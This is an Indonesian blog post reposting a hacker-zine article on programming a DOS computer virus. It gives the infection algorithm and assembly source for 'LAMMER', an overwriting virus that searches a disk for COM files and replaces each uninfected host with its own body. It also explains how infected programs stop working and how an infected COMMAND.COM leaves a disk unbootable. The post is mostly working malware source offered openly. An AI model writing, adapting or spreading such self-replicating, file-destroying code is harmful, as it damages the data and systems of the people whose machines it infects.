Virus

Pemerograman Virus Komputer Bagian II
Author : Dr`Ponidi
Edited by : SaMuRai_HaCk
Dedication : For Knowledgement & Open Source
Greetz : #DEFACE-TEAM@…
#DHEGLENG@…
Terbitan Online kecoak elektronik
http://www.k-elektronik.org/
======================================================================
==

1. Pendahuluan

Virus komputer yang akan dibicarakan dibawah ini ditulis dalam bahasa
assembley.Bila
dibandingkan dengan virus bacthfile, yang pernah kita bicarakan maka
virus yang kita bahas
sekarang ini telah memiliki kelima kemampuan seperti apa yang telah
saya sampaikan
terdahulu.
Virus ini mampu mencari semua file COM yang ada pada disket, serta
memeriksanya apakah
telah tertular atau belum.Bila belum, maka virus akan
menularinya.Routine manipulasi yang
dimiliki virus ini hanyalah berupa tampilan pesan :
“File ini telah tertular Virus komputer!” atau “Semua file COM pada
disket ini telah
tertular virus komputer!!!”.
Berbeda dengan virus batchfile yang menghasilkan file baru dan
membutuhkan beberapa file
untuk menjalankannya, maka virus yang akan kita bahas ini nantinya
dapat bekerja sendiri
dan tidak menghasilkan file baru, sehingga kemampuan menyembunyikan
diri dari virus ini
lebih baik.
Seperti halnya virus batchfile, virus dibawah ini adalah termasuk
jenis virus yang
menumpangi program yang ditularinya.Dengan demikian virus ini
bersifat merusak.

2. Algoritma

Algoritma yang digunakan adalah sbb:
1. Cari file COM yang pertama
2. Buka dan baca file tersebut, letakkan pada buffer (di RAM)
3. Dengan membandingkan tanda pengenal virus dan rangkaian byte
bagian awal dari program,
periksa apakah file tersebut telah tertular virus atau belum.
4. a) Bila belum, maka tulari file tersebut dengan jalan menyalin
seluruh program virus
ke file tersebut (menumpangi).Kemudian tampilkan pesan :”File
ini telah tertular
Virus Komputer !”
b) Bila sudah, maka carilah file COM berikutnya.Ulangi langkah 2.
5. Jika semua file COM telah tertular, maka tampilkan pesan : “semua
file Com pada disket
ini telah tertular virus komputer!!!”

3. Program dan Mekanisme Penularan

Program dibawah ini merupakan implementasi dari bagian diatas.

Catatan : Program virus ini menggunakan instruksi macro.Definisi
macro yang digunakan
terdapat pada file LAMMER.MAC. klo pengen liat file
macronya kirim email ke
Dr`Ponidi@…)

;———————————————————————
—————
; LAMMER.ASM
;
;CODE BY : #DEFACE-TEAM@…
; #DHEGLENG@…
;
;RETRIEVAL SYSTEM BY: DR`PONIDI@…
;
;VIRUS INI MENYERANG DAN MERUSAK SEMUA FILE COM.
;BERHATI-HATILAH!
;———————————————————————
—————

IF1
INCLUDE LAMMER.MAC
ENDIF

Code_seg SEGMENT
ASSUME CS:Code_seg
ORG 100h
Mulai : jmp kerjakan
Identitas DB `File ini telah tertular virus komputer !$`
Peringatan DB `semua file COM dalam disket ini telah tertular virus`
DB `Komputer !!!$`
File_COM DB`*.com`,0h
Nama_file DB 13 DUP(?)
Panjang_id equ 45
Panjang_vir equ 445
Atribut equ 20h
Open_code equ 2
Jumlah equ 0ffffh
DTA DB43 DUP(20h)

Kerjakan : Set_DTA DTA
Mov ax,0
Find_first file_COM,Atribut
Masih_adakah:cmp ax,0
Je Laksanakan
Cmp ax,2
Je Keluar
Tulis_string peringatan
Jmp Keluar
Keluar : Ke_dos
Laksanakan : mov si,offset DTA + 30
Pindahkan_string 13,nama_file
Buka_file_DTA DTA,Open_code
Push bx
Baca_file bx,Buffer,jumlah
Push ax
Mov di,offset Buffer + 3
Bandingkan-string Identitas,panjang_id
Cmp bx,0
Je Cari_lainnya
Mov si,100h
Pindahkan_string panjang_vir,Buffer
Pop ax
Pop bx
Push ax
Tutup_file bx
Hapus_file Nama_file
Buat_file Nama_file,Atribut
Buka_file Nama_file,Open_code
Pop ax
Tulis_file bx,buffer,ax
Tutup_file bx
Tulis_string identitas
Ke_dos

Cari_lainnya : pop ax
pop bx
Tutup_file bx
Find_next
Jmp masih_adakah
Buffer Label byte
Code_seg ENDS
END mulai

4. Penjelasan

Awal dari penularan dimulai ketika program virus ini dijalankan pada
disket yang berisi
file-file COM.Virus mula-mula akan menulari file COM yang pertama
(berdasarkan urutan
file-file pada disket).Dengan penularan ini, maka file tersebut
menjadi sumber penularan
baru, dan virus yang asli dapat dihapus.File-file yang telah tertular
ukurannya tidak
berubah.
Bila file yang telah tertular itu dijalankan, maka file itu tidak
dapat menjalankan
fungsinya dan hanya akan menampilkan pesan :”File ini telah tertular
Virus
komputer!”.Sebelumnya, file tersebut akan menulari file COM lainnya.
Bila kebetulan file .COM pertama yang diserang didalam directory
utama adalah COMMAND.COM,
maka setiap kali melakukan boot dengan disket itu, tak akan pernah
berhasil dan sebelumnya
virus akan menulari sebuah program COM lain yang belum tertular.
Harapa diperhatikan bahwa virus ini tidak dapat bekerja dengan baik
bila berada pada file
COM yang ukurannya lebih kecil daripada ukuran program virus yang
asli, atau terlalu besar
(mendekati atau lebih dari FFFF heksadesimal = 64KB)
Ini disebabkan karena program virus tidak dapat disalin secara
lengkap atau buffer telah
melampaui batas daerah CS (Code Segment)

Demikianlah Artikel yang dapat saya sampaikan pada kesempatan ini,
Semoga informasi yang
saya sampaikan dapat bermanfaat bagi pengetahuan bagi kita
semua ,khususnya bagi yang
concern terhadap virus.Sekian terima kasih cao

Published in: on October 8, 2007 at 8:14 am  Leave a Comment  

The URI to TrackBack this entry is: https://miqrosoft.wordpress.com/2007/10/08/virus/trackback/

RSS feed for comments on this post.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: